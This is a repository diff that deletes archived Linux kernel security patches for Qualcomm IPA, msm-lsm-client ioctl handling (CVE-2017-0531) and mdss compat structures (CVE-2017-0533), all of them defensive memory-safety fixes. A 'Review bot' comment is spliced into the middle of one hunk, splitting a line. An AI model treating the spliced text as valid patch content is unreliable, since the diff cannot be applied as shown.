__ipa3_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr) - } - - --int __ipa3_del_hdr(u32 hdr_hdl) -+int __ipa3_del_hdr(u32 hdr_hdl, bool by_user) - { - struct ipa3_hdr_entry *entry; - struct ipa3_hdr_tbl *htbl = &ipa3_ctx->hdr_tbl; -@@ -625,7 +634,7 @@ int __ipa3_del_hdr(u32 hdr_hdl) - return -EINVAL; - } - -- if (!entry || (entry->cookie != IPA_COOKIE)) { -+ if (entry->cookie != IPA_COOKIE) { - IPAERR("bad parm\n"); - return -EINVAL; - } -@@ -638,6 +647,14 @@ int __ipa3_del_hdr(u32 hdr_hdl) - entry->hdr_len, htbl->hdr_cnt, - entry->offset_entry->offset); - -+ if (by_user && entry->user_deleted) { -+ IPAERR("proc_ctx already deleted by user\n"); -+ return -EINVAL; -+ } -+ -+ if (by_user) -+ entry->user_deleted = true; -+ - if 
(--entry->ref_cnt) { - IPADBG("hdr_hdl %x ref_cnt %d\n", hdr_hdl, entry->ref_cnt); - return 0; -@@ -648,7 +665,7 @@ int __ipa3_del_hdr(u32 hdr_hdl) - entry->phys_base, - entry->hdr_len, - DMA_TO_DEVICE); -- __ipa3_del_hdr_proc_ctx(entry->proc_ctx->id, false); -+ __ipa3_del_hdr_proc_ctx(entry->proc_ctx->id, false, false); - } else { - /* move the offset entry to appropriate free list */ - list_move(&entry->offset_entry->link, -@@ -710,15 +727,16 @@ bail: - } - - /** -- * ipa3_del_hdr() - Remove the specified headers from SW and optionally commit them -- * to IPA HW -+ * ipa3_del_hdr_by_user() - Remove the specified headers -+ * from SW and optionally commit them to IPA HW - * @hdls: [inout] set of headers to delete -+ * @by_user: Operation requested by user? - * - * Returns: 0 on success, negative on failure - * - * Note: Should not be called from atomic context - */ --int ipa3_del_hdr(struct ipa_ioc_del_hdr *hdls) -+int ipa3_del_hdr_by_user(struct ipa_ioc_del_hdr *hdls, bool by_user) - { - int i; - int result = -EFAULT; -@@ -730,7 +748,7 @@ int ipa3_del_hdr(struct ipa_ioc_del_hdr *hdls) - - mutex_lock(&ipa3_ctx->lock); - for (i = 0; i < hdls->num_hdls; i++) { -- if (__ipa3_del_hdr(hdls->hdl[i].hdl)) { -+ if (__ipa3_del_hdr(hdls->hdl[i].hdl, by_user)) { - IPAERR("failed to del hdr %i\n", i); - hdls->hdl[i].status = -1; - } else { -@@ -751,6 +769,20 @@ bail: - } - - /** -+ * ipa3_del_hdr() - Remove the specified headers from SW -+ * and optionally commit them to IPA HW -+ * @hdls: [inout] set of headers to delete -+ * -+ * Returns: 0 on success, negative on failure -+ * -+ * Note: Should not be called from atomic context -+ */ -+int ipa3_del_hdr(struct ipa_ioc_del_hdr *hdls) -+{ -+ return ipa3_del_hdr_by_user(hdls, false); -+} -+ -+/** - * ipa3_add_hdr_proc_ctx() - add the specified headers to SW - * and optionally commit them to IPA HW - * @proc_ctxs: [inout] set of processing context headers to add -@@ -795,16 +827,18 @@ bail: - } - - /** -- * 
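Review bot: The rejection path added to `__ipa3_del_hdr()` logs `proc_ctx already deleted by user`, but this function deletes a header entry, so the message sends whoever reads the log to the wrong table; the ipa_v2 counterpart `__ipa_del_hdr()` logs `hdr already deleted by user`. Change the line to `IPAERR("hdr already deleted by user\n");`. The same copy-pasted message appears in the earlier copy of this change on the page (the ipa_v3/ipa_hdr.c hunk `@@ -635,6 +644,14 @@`). A repeated user-space delete is the condition this fix exists to stop, so this log line is what someone triaging an alert will search for. The body of `__ipa3_del_hdr()` continues outside the hunk.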
ipa3_del_hdr_proc_ctx() - -+ * ipa3_del_hdr_proc_ctx_by_user() - - * Remove the specified processing context headers from SW and - * optionally commit them to IPA HW. - * @hdls: [inout] set of processing context headers to delete -+ * @by_user: Operation requested by user? - * - * Returns: 0 on success, negative on failure - * - * Note: Should not be called from atomic context - */ --int ipa3_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls) -+int ipa3_del_hdr_proc_ctx_by_user(struct ipa_ioc_del_hdr_proc_ctx *hdls, -+ bool by_user) - { - int i; - int result; -@@ -816,7 +850,7 @@ int ipa3_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls) - - mutex_lock(&ipa3_ctx->lock); - for (i = 0; i < hdls->num_hdls; i++) { -- if (__ipa3_del_hdr_proc_ctx(hdls->hdl[i].hdl, true)) { -+ if (__ipa3_del_hdr_proc_ctx(hdls->hdl[i].hdl, true, by_user)) { - IPAERR("failed to del hdr %i\n", i); - hdls->hdl[i].status = -1; - } else { -@@ -837,6 +871,21 @@ bail: - } - - /** -+ * ipa3_del_hdr_proc_ctx() - -+ * Remove the specified processing context headers from SW and -+ * optionally commit them to IPA HW. 
-+ * @hdls: [inout] set of processing context headers to delete -+ * -+ * Returns: 0 on success, negative on failure -+ * -+ * Note: Should not be called from atomic context -+ */ -+int ipa3_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls) -+{ -+ return ipa3_del_hdr_proc_ctx_by_user(hdls, false); -+} -+ -+/** - * ipa3_commit_hdr() - commit to IPA HW the current header table in SW - * - * Returns: 0 on success, negative on failure -@@ -1064,7 +1113,7 @@ int __ipa3_release_hdr(u32 hdr_hdl) - { - int result = 0; - -- if (__ipa3_del_hdr(hdr_hdl)) { -+ if (__ipa3_del_hdr(hdr_hdl, false)) { - IPADBG("fail to del hdr %x\n", hdr_hdl); - result = -EFAULT; - goto bail; -@@ -1092,7 +1141,7 @@ int __ipa3_release_hdr_proc_ctx(u32 proc_ctx_hdl) - { - int result = 0; - -- if (__ipa3_del_hdr_proc_ctx(proc_ctx_hdl, true)) { -+ if (__ipa3_del_hdr_proc_ctx(proc_ctx_hdl, true, false)) { - IPADBG("fail to del hdr %x\n", proc_ctx_hdl); - result = -EFAULT; - goto bail; -diff --git a/drivers/platform/msm/ipa/ipa_v3/ipa_i.h b/drivers/platform/msm/ipa/ipa_v3/ipa_i.h -index fe7c88a..b3ce524 100644 ---- a/drivers/platform/msm/ipa/ipa_v3/ipa_i.h -+++ b/drivers/platform/msm/ipa/ipa_v3/ipa_i.h -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -279,6 +279,7 @@ struct ipa3_rt_tbl { - * @id: header entry id - * @is_eth2_ofst_valid: is eth2_ofst field valid? - * @eth2_ofst: offset to start of Ethernet-II/802.3 header -+ * @user_deleted: is the header deleted by the user? 
- */ - struct ipa3_hdr_entry { - struct list_head link; -@@ -296,6 +297,7 @@ struct ipa3_hdr_entry { - int id; - u8 is_eth2_ofst_valid; - u16 eth2_ofst; -+ bool user_deleted; - }; - - /** -@@ -335,6 +337,7 @@ struct ipa3_hdr_proc_ctx_offset_entry { - * @cookie: cookie used for validity check - * @ref_cnt: reference counter of routing table - * @id: processing context header entry id -+ * @user_deleted: is the hdr processing context deleted by the user? - */ - struct ipa3_hdr_proc_ctx_entry { - struct list_head link; -@@ -344,6 +347,7 @@ struct ipa3_hdr_proc_ctx_entry { - u32 cookie; - u32 ref_cnt; - int id; -+ bool user_deleted; - }; - - /** -@@ -1548,6 +1552,8 @@ int ipa3_add_hdr(struct ipa_ioc_add_hdr *hdrs); - - int ipa3_del_hdr(struct ipa_ioc_del_hdr *hdls); - -+int ipa3_del_hdr_by_user(struct ipa_ioc_del_hdr *hdls, bool by_user); -+ - int ipa3_commit_hdr(void); - - int ipa3_reset_hdr(void); -@@ -1565,6 +1571,9 @@ int ipa3_add_hdr_proc_ctx(struct ipa_ioc_add_hdr_proc_ctx *proc_ctxs); - - int ipa3_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls); - -+int ipa3_del_hdr_proc_ctx_by_user(struct ipa_ioc_del_hdr_proc_ctx *hdls, -+ bool by_user); -+ - /* - * Routing - */ -@@ -1869,7 +1878,7 @@ int ipa3_active_clients_log_print_table(char *buf, int size); - void ipa3_active_clients_log_clear(void); - int ipa3_interrupts_init(u32 ipa_irq, u32 ee, struct device *ipa_dev); - int __ipa3_del_rt_rule(u32 rule_hdl); --int __ipa3_del_hdr(u32 hdr_hdl); -+int __ipa3_del_hdr(u32 hdr_hdl, bool by_user); - int __ipa3_release_hdr(u32 hdr_hdl); - int __ipa3_release_hdr_proc_ctx(u32 proc_ctx_hdl); - int _ipa_read_ep_reg_v3_0(char *buf, int max_len, int pipe); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-0531/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-0531/3.18/0001.patch deleted file mode 100644 index 8c9dd352..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0531/3.18/0001.patch +++ /dev/null 
@@ -1,275 +0,0 @@
-From 530f3a0fd837ed105eddaf99810bc13d97dc4302 Mon Sep 17 00:00:00 2001
-From: Bhalchandra Gajare
-Date: Thu, 15 Dec 2016 16:43:45 -0800
-Subject: ASoC: msm-lsm-client: cleanup ioctl functions
-
-Some of the ioctl command handling is not properly using the
-copy_from_user interface. Fix these issues and cleanup the ioctl
-functions to make sure there is no illegal memory access.
-
-CRs-Fixed: 1087469
-Change-Id: Ieb1beb92e7854a05b8045de0ce179d12c9a6da74
-Signed-off-by: Bhalchandra Gajare
----
- sound/soc/msm/qdsp6v2/msm-lsm-client.c | 131 ++++++++++-----------------------
- 1 file changed, 40 insertions(+), 91 deletions(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-lsm-client.c b/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-index 32a16bf..c365220 100644
---- a/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-+++ b/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-@@ -727,8 +727,13 @@ static int msm_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- switch (cmd) {
- case SNDRV_LSM_SET_SESSION_DATA:
- dev_dbg(rtd->dev, "%s: set session data\n", __func__);
-- memcpy(&session_data, arg,
-- sizeof(struct snd_lsm_session_data));
-+ if (copy_from_user(&session_data, arg,
-+ sizeof(session_data))) {
-+ dev_err(rtd->dev, "%s: %s: copy_from_user failed\n",
-+ __func__, "LSM_SET_SESSION_DATA");
-+ return -EFAULT;
-+ }
-+
- if (session_data.app_id != LSM_VOICE_WAKEUP_APP_ID_V2) {
- dev_err(rtd->dev,
- "%s:Invalid App id %d for Listen client\n",
-@@ -817,13 +822,6 @@ static int msm_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- break;
-
- case SNDRV_LSM_SET_PARAMS:
-- if (!arg) {
-- dev_err(rtd->dev,
-- "%s: %s Invalid argument\n",
-- __func__, "SNDRV_LSM_SET_PARAMS");
-- return -EINVAL;
-- }
--
- dev_dbg(rtd->dev, "%s: set_params\n", __func__);
- memcpy(&det_params, arg,
- sizeof(det_params));
-@@ -975,45 +973,43 @@ static int msm_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- break;
- }
- case SNDRV_LSM_LAB_CONTROL: {
-- u32 *enable = NULL;
-- if (!arg) {
-- dev_err(rtd->dev,
-- "%s: Invalid param arg for ioctl %s session %d\n",
-- __func__, "SNDRV_LSM_LAB_CONTROL",
-- prtd->lsm_client->session);
-- rc = -EINVAL;
-- break;
-+ u32 enable;
-+
-+ if (copy_from_user(&enable, arg, sizeof(enable))) {
-+ dev_err(rtd->dev, "%s: %s: copy_frm_user failed\n",
-+ __func__, "LSM_LAB_CONTROL");
-+ return -EFAULT;
- }
-- enable = (int *)arg;
-+
- dev_dbg(rtd->dev, "%s: ioctl %s, enable = %d\n",
-- __func__, "SNDRV_LSM_LAB_CONTROL", *enable);
-+ __func__, "SNDRV_LSM_LAB_CONTROL", enable);
- if (!prtd->lsm_client->started) {
-- if (prtd->lsm_client->lab_enable == *enable) {
-+ if (prtd->lsm_client->lab_enable == enable) {
- dev_dbg(rtd->dev,
- "%s: Lab for session %d already %s\n",
- __func__, prtd->lsm_client->session,
-- ((*enable) ? "enabled" : "disabled"));
-+ enable ? "enabled" : "disabled");
- rc = 0;
- break;
- }
-- rc = q6lsm_lab_control(prtd->lsm_client, *enable);
-+ rc = q6lsm_lab_control(prtd->lsm_client, enable);
- if (rc) {
- dev_err(rtd->dev,
- "%s: ioctl %s failed rc %d to %s lab for session %d\n",
- __func__, "SNDRV_LAB_CONTROL", rc,
-- ((*enable) ? "enable" : "disable"),
-+ enable ? "enable" : "disable",
- prtd->lsm_client->session);
- } else {
- rc = msm_lsm_lab_buffer_alloc(prtd,
-- ((*enable) ? LAB_BUFFER_ALLOC
-- : LAB_BUFFER_DEALLOC));
-+ enable ? LAB_BUFFER_ALLOC
-+ : LAB_BUFFER_DEALLOC);
- if (rc)
- dev_err(rtd->dev,
- "%s: msm_lsm_lab_buffer_alloc failed rc %d for %s",
- __func__, rc,
-- ((*enable) ? "ALLOC" : "DEALLOC"));
-+ enable ? "ALLOC" : "DEALLOC");
- if (!rc)
-- prtd->lsm_client->lab_enable = *enable;
-+ prtd->lsm_client->lab_enable = enable;
- }
- } else {
- dev_err(rtd->dev, "%s: ioctl %s issued after start",
-@@ -1060,12 +1056,6 @@ static int msm_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- return rc;
- }
- #ifdef CONFIG_COMPAT
--struct snd_lsm_event_status32 {
-- u16 status;
-- u16 payload_size;
-- u8 payload[0];
--};
--
- struct snd_lsm_sound_model_v2_32 {
- compat_uptr_t data;
- compat_uptr_t confidence_level;
-@@ -1097,8 +1087,6 @@ struct snd_lsm_module_params_32 {
- };
-
- enum {
-- SNDRV_LSM_EVENT_STATUS32 =
-- _IOW('U', 0x02, struct snd_lsm_event_status32),
- SNDRV_LSM_REG_SND_MODEL_V2_32 =
- _IOW('U', 0x07, struct snd_lsm_sound_model_v2_32),
- SNDRV_LSM_SET_PARAMS_32 =
-@@ -1129,12 +1117,12 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- prtd = runtime->private_data;
-
- switch (cmd) {
-- case SNDRV_LSM_EVENT_STATUS32: {
-- struct snd_lsm_event_status32 userarg32, *user32 = NULL;
-- struct snd_lsm_event_status *user = NULL;
-+ case SNDRV_LSM_EVENT_STATUS: {
-+ struct snd_lsm_event_status *user = NULL, userarg32;
-+ struct snd_lsm_event_status *user32 = NULL;
- if (copy_from_user(&userarg32, arg, sizeof(userarg32))) {
- dev_err(rtd->dev, "%s: err copyuser ioctl %s\n",
-- __func__, "SNDRV_LSM_EVENT_STATUS32");
-+ __func__, "SNDRV_LSM_EVENT_STATUS");
- return -EFAULT;
- }
-
-@@ -1288,13 +1276,6 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- return -EINVAL;
- }
-
-- if (!arg) {
-- dev_err(rtd->dev,
-- "%s: %s: No Param data to set\n",
-- __func__, "SET_MODULE_PARAMS_32");
-- return -EINVAL;
-- }
--
- if (copy_from_user(&p_data_32, arg,
- sizeof(p_data_32))) {
- dev_err(rtd->dev,
-@@ -1379,6 +1360,19 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- kfree(params32);
- break;
- }
-+ case SNDRV_LSM_REG_SND_MODEL_V2:
-+ case SNDRV_LSM_SET_PARAMS:
-+ case SNDRV_LSM_SET_MODULE_PARAMS:
-+ /*
-+ * In ideal cases, the compat_ioctl should never be called
-+ * with the above unlocked ioctl commands. Print error
-+ * and return error if it does.
-+ */
-+ dev_err(rtd->dev,
-+ "%s: Invalid cmd for compat_ioctl\n",
-+ __func__);
-+ err = -EINVAL;
-+ break;
- default:
- err = msm_lsm_ioctl_shared(substream, cmd, arg);
- break;
-@@ -1394,7 +1388,6 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- {
- int err = 0;
- u32 size = 0;
-- struct snd_lsm_session_data session_data;
- struct snd_pcm_runtime *runtime;
- struct snd_soc_pcm_runtime *rtd;
- struct lsm_priv *prtd;
-@@ -1409,26 +1402,6 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- rtd = substream->private_data;
-
- switch (cmd) {
-- case SNDRV_LSM_SET_SESSION_DATA:
-- dev_dbg(rtd->dev,
-- "%s: SNDRV_LSM_SET_SESSION_DATA\n",
-- __func__);
-- if (copy_from_user(&session_data, (void *)arg,
-- sizeof(struct snd_lsm_session_data))) {
-- err = -EFAULT;
-- dev_err(rtd->dev,
-- "%s: copy from user failed, size %zd\n",
-- __func__, sizeof(struct snd_lsm_session_data));
-- break;
-- }
-- if (!err)
-- err = msm_lsm_ioctl_shared(substream,
-- cmd, &session_data);
-- if (err)
-- dev_err(rtd->dev,
-- "%s REG_SND_MODEL failed err %d\n",
-- __func__, err);
-- break;
- case SNDRV_LSM_REG_SND_MODEL_V2: {
- struct snd_lsm_sound_model_v2 snd_model_v2;
-
-@@ -1439,11 +1412,6 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- return -EINVAL;
- }
-
-- if (!arg) {
-- dev_err(rtd->dev,
-- "%s: Invalid params snd_model\n", __func__);
-- return -EINVAL;
-- }
- if (copy_from_user(&snd_model_v2, arg, sizeof(snd_model_v2))) {
- err = -EFAULT;
- dev_err(rtd->dev,
-@@ -1472,12 +1440,6 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- }
-
- pr_debug("%s: SNDRV_LSM_SET_PARAMS\n", __func__);
-- if (!arg) {
-- dev_err(rtd->dev,
-- "%s: %s, Invalid params\n",
-- __func__, "SNDRV_LSM_SET_PARAMS");
-- return -EINVAL;
-- }
-
- if (copy_from_user(&det_params, arg,
- sizeof(det_params))) {
-@@ -1510,13 +1472,6 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- return -EINVAL;
- }
-
-- if (!arg) {
-- dev_err(rtd->dev,
-- "%s: %s: No Param data to set\n",
-- __func__, "SET_MODULE_PARAMS");
-- return -EINVAL;
-- }
--
- if (copy_from_user(&p_data, arg,
- sizeof(p_data))) {
- dev_err(rtd->dev,
-@@ -1574,12 +1529,6 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- struct snd_lsm_event_status *user = NULL, userarg;
- dev_dbg(rtd->dev,
- "%s: SNDRV_LSM_EVENT_STATUS\n", __func__);
-- if (!arg) {
-- dev_err(rtd->dev,
-- "%s: Invalid params event status\n",
-- __func__);
-- return -EINVAL;
-- }
- if (copy_from_user(&userarg, arg, sizeof(userarg))) {
- dev_err(rtd->dev,
- "%s: err copyuser event_status\n",
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0531/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-0531/4.4/0002.patch
deleted file mode 100644
index c2daf375..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0531/4.4/0002.patch
+++ /dev/null
@@ -1,275 +0,0 @@
-From d342da7d820af9c7c0b0b8049adb53beb713e0f0 Mon Sep 17 00:00:00 2001
-From: Bhalchandra Gajare
-Date: Thu, 15 Dec 2016 16:43:45 -0800
-Subject: ASoC: msm-lsm-client: cleanup ioctl functions
-
-Some of the ioctl command handling is not properly using the
-copy_from_user interface. Fix these issues and cleanup the ioctl
-functions to make sure there is no illegal memory access.
-
-CRs-Fixed: 1087469
-Change-Id: Ieb1beb92e7854a05b8045de0ce179d12c9a6da74
-Signed-off-by: Bhalchandra Gajare
----
- sound/soc/msm/qdsp6v2/msm-lsm-client.c | 131 ++++++++++-----------------------
- 1 file changed, 40 insertions(+), 91 deletions(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-lsm-client.c b/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-index 52830c9..efb6644e 100644
---- a/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-+++ b/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-@@ -730,8 +730,13 @@ static int msm_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- switch (cmd) {
- case SNDRV_LSM_SET_SESSION_DATA:
- dev_dbg(rtd->dev, "%s: set session data\n", __func__);
-- memcpy(&session_data, arg,
-- sizeof(struct snd_lsm_session_data));
-+ if (copy_from_user(&session_data, arg,
-+ sizeof(session_data))) {
-+ dev_err(rtd->dev, "%s: %s: copy_from_user failed\n",
-+ __func__, "LSM_SET_SESSION_DATA");
-+ return -EFAULT;
-+ }
-+
- if (session_data.app_id != LSM_VOICE_WAKEUP_APP_ID_V2) {
- dev_err(rtd->dev,
- "%s:Invalid App id %d for Listen client\n",
-@@ -820,13 +825,6 @@ static int msm_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- break;
-
- case SNDRV_LSM_SET_PARAMS:
-- if (!arg) {
-- dev_err(rtd->dev,
-- "%s: %s Invalid argument\n",
-- __func__, "SNDRV_LSM_SET_PARAMS");
-- return -EINVAL;
-- }
--
- dev_dbg(rtd->dev, "%s: set_params\n", __func__);
- memcpy(&det_params, arg,
- sizeof(det_params));
-@@ -978,45 +976,43 @@ static int msm_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- break;
- }
- case SNDRV_LSM_LAB_CONTROL: {
-- u32 *enable = NULL;
-- if (!arg) {
-- dev_err(rtd->dev,
-- "%s: Invalid param arg for ioctl %s session %d\n",
-- __func__, "SNDRV_LSM_LAB_CONTROL",
-- prtd->lsm_client->session);
-- rc = -EINVAL;
-- break;
-+ u32 enable;
-+
-+ if (copy_from_user(&enable, arg, sizeof(enable))) {
-+ dev_err(rtd->dev, "%s: %s: copy_frm_user failed\n",
-+ __func__, "LSM_LAB_CONTROL");
-+ return -EFAULT;
- }
-- enable = (int *)arg;
-+
- dev_dbg(rtd->dev, "%s: ioctl %s, enable = %d\n",
-- __func__, "SNDRV_LSM_LAB_CONTROL", *enable);
-+ __func__, "SNDRV_LSM_LAB_CONTROL", enable);
- if (!prtd->lsm_client->started) {
-- if (prtd->lsm_client->lab_enable == *enable) {
-+ if (prtd->lsm_client->lab_enable == enable) {
- dev_dbg(rtd->dev,
- "%s: Lab for session %d already %s\n",
- __func__, prtd->lsm_client->session,
-- ((*enable) ? "enabled" : "disabled"));
-+ enable ? "enabled" : "disabled");
- rc = 0;
- break;
- }
-- rc = q6lsm_lab_control(prtd->lsm_client, *enable);
-+ rc = q6lsm_lab_control(prtd->lsm_client, enable);
- if (rc) {
- dev_err(rtd->dev,
- "%s: ioctl %s failed rc %d to %s lab for session %d\n",
- __func__, "SNDRV_LAB_CONTROL", rc,
-- ((*enable) ? "enable" : "disable"),
-+ enable ? "enable" : "disable",
- prtd->lsm_client->session);
- } else {
- rc = msm_lsm_lab_buffer_alloc(prtd,
-- ((*enable) ? LAB_BUFFER_ALLOC
-- : LAB_BUFFER_DEALLOC));
-+ enable ? LAB_BUFFER_ALLOC
-+ : LAB_BUFFER_DEALLOC);
- if (rc)
- dev_err(rtd->dev,
- "%s: msm_lsm_lab_buffer_alloc failed rc %d for %s",
- __func__, rc,
-- ((*enable) ? "ALLOC" : "DEALLOC"));
-+ enable ? "ALLOC" : "DEALLOC");
- if (!rc)
-- prtd->lsm_client->lab_enable = *enable;
-+ prtd->lsm_client->lab_enable = enable;
- }
- } else {
- dev_err(rtd->dev, "%s: ioctl %s issued after start",
-@@ -1057,12 +1053,6 @@ static int msm_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- return rc;
- }
- #ifdef CONFIG_COMPAT
--struct snd_lsm_event_status32 {
-- u16 status;
-- u16 payload_size;
-- u8 payload[0];
--};
--
- struct snd_lsm_sound_model_v2_32 {
- compat_uptr_t data;
- compat_uptr_t confidence_level;
-@@ -1094,8 +1084,6 @@ struct snd_lsm_module_params_32 {
- };
-
- enum {
-- SNDRV_LSM_EVENT_STATUS32 =
-- _IOW('U', 0x02, struct snd_lsm_event_status32),
- SNDRV_LSM_REG_SND_MODEL_V2_32 =
- _IOW('U', 0x07, struct snd_lsm_sound_model_v2_32),
- SNDRV_LSM_SET_PARAMS_32 =
-@@ -1126,12 +1114,12 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- prtd = runtime->private_data;
-
- switch (cmd) {
-- case SNDRV_LSM_EVENT_STATUS32: {
-- struct snd_lsm_event_status32 userarg32, *user32 = NULL;
-- struct snd_lsm_event_status *user = NULL;
-+ case SNDRV_LSM_EVENT_STATUS: {
-+ struct snd_lsm_event_status *user = NULL, userarg32;
-+ struct snd_lsm_event_status *user32 = NULL;
- if (copy_from_user(&userarg32, arg, sizeof(userarg32))) {
- dev_err(rtd->dev, "%s: err copyuser ioctl %s\n",
-- __func__, "SNDRV_LSM_EVENT_STATUS32");
-+ __func__, "SNDRV_LSM_EVENT_STATUS");
- return -EFAULT;
- }
-
-@@ -1285,13 +1273,6 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- return -EINVAL;
- }
-
-- if (!arg) {
-- dev_err(rtd->dev,
-- "%s: %s: No Param data to set\n",
-- __func__, "SET_MODULE_PARAMS_32");
-- return -EINVAL;
-- }
--
- if (copy_from_user(&p_data_32, arg,
- sizeof(p_data_32))) {
- dev_err(rtd->dev,
-@@ -1376,6 +1357,19 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- kfree(params32);
- break;
- }
-+ case SNDRV_LSM_REG_SND_MODEL_V2:
-+ case SNDRV_LSM_SET_PARAMS:
-+ case SNDRV_LSM_SET_MODULE_PARAMS:
-+ /*
-+ * In ideal cases, the compat_ioctl should never be called
-+ * with the above unlocked ioctl commands. Print error
-+ * and return error if it does.
-+ */
-+ dev_err(rtd->dev,
-+ "%s: Invalid cmd for compat_ioctl\n",
-+ __func__);
-+ err = -EINVAL;
-+ break;
- default:
- err = msm_lsm_ioctl_shared(substream, cmd, arg);
- break;
-@@ -1391,7 +1385,6 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- {
- int err = 0;
- u32 size = 0;
-- struct snd_lsm_session_data session_data;
- struct snd_pcm_runtime *runtime;
- struct snd_soc_pcm_runtime *rtd;
- struct lsm_priv *prtd;
-@@ -1406,26 +1399,6 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- rtd = substream->private_data;
-
- switch (cmd) {
-- case SNDRV_LSM_SET_SESSION_DATA:
-- dev_dbg(rtd->dev,
-- "%s: SNDRV_LSM_SET_SESSION_DATA\n",
-- __func__);
-- if (copy_from_user(&session_data, (void *)arg,
-- sizeof(struct snd_lsm_session_data))) {
-- err = -EFAULT;
-- dev_err(rtd->dev,
-- "%s: copy from user failed, size %zd\n",
-- __func__, sizeof(struct snd_lsm_session_data));
-- break;
-- }
-- if (!err)
-- err = msm_lsm_ioctl_shared(substream,
-- cmd, &session_data);
-- if (err)
-- dev_err(rtd->dev,
-- "%s REG_SND_MODEL failed err %d\n",
-- __func__, err);
-- break;
- case SNDRV_LSM_REG_SND_MODEL_V2: {
- struct snd_lsm_sound_model_v2 snd_model_v2;
-
-@@ -1436,11 +1409,6 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- return -EINVAL;
- }
-
-- if (!arg) {
-- dev_err(rtd->dev,
-- "%s: Invalid params snd_model\n", __func__);
-- return -EINVAL;
-- }
- if (copy_from_user(&snd_model_v2, arg, sizeof(snd_model_v2))) {
- err = -EFAULT;
- dev_err(rtd->dev,
-@@ -1469,12 +1437,6 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- }
-
- pr_debug("%s: SNDRV_LSM_SET_PARAMS\n", __func__);
-- if (!arg) {
-- dev_err(rtd->dev,
-- "%s: %s, Invalid params\n",
-- __func__, "SNDRV_LSM_SET_PARAMS");
-- return -EINVAL;
-- }
-
- if (copy_from_user(&det_params, arg,
- sizeof(det_params))) {
-@@ -1507,13 +1469,6 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- return -EINVAL;
- }
-
-- if (!arg) {
-- dev_err(rtd->dev,
-- "%s: %s: No Param data to set\n",
-- __func__, "SET_MODULE_PARAMS");
-- return -EINVAL;
-- }
--
- if (copy_from_user(&p_data, arg,
- sizeof(p_data))) {
- dev_err(rtd->dev,
-@@ -1571,12 +1526,6 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- struct snd_lsm_event_status *user = NULL, userarg;
- dev_dbg(rtd->dev,
- "%s: SNDRV_LSM_EVENT_STATUS\n", __func__);
-- if (!arg) {
-- dev_err(rtd->dev,
-- "%s: Invalid params event status\n",
-- __func__);
-- return -EINVAL;
-- }
- if (copy_from_user(&userarg, arg, sizeof(userarg))) {
- dev_err(rtd->dev,
- "%s: err copyuser event_status\n",
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0533/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0533/ANY/0001.patch
deleted file mode 100644
index b08ceefb..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0533/ANY/0001.patch
+++ /dev/null
@@ -1,73 +0,0 @@
-From e3af5e89426f1c8d4e703d415eff5435b925649f Mon Sep 17 00:00:00 2001
-From: Benet Clark
-Date: Thu, 10 Nov 2016 17:49:09 -0800
-Subject: msm: mdss: Clear compat structures before copying to user
-
-In the compat layer, the temporary structures used to convert
-data from 32bit to 64bit structures need to be set to 0 before
-being assigned values.
-
-CRs-Fixed: 1088206
-Change-Id: I04497bc11e01c3df4beadfd6d9b06ab4321f1723
-Signed-off-by: Benet Clark
----
- drivers/video/msm/mdss/mdss_compat_utils.c | 8 ++++++++
- 1 file changed, 8 insertions(+)
-
-diff --git a/drivers/video/msm/mdss/mdss_compat_utils.c b/drivers/video/msm/mdss/mdss_compat_utils.c
-index 5ad51dd..a9ab5c1 100644
---- a/drivers/video/msm/mdss/mdss_compat_utils.c
-+++ b/drivers/video/msm/mdss/mdss_compat_utils.c
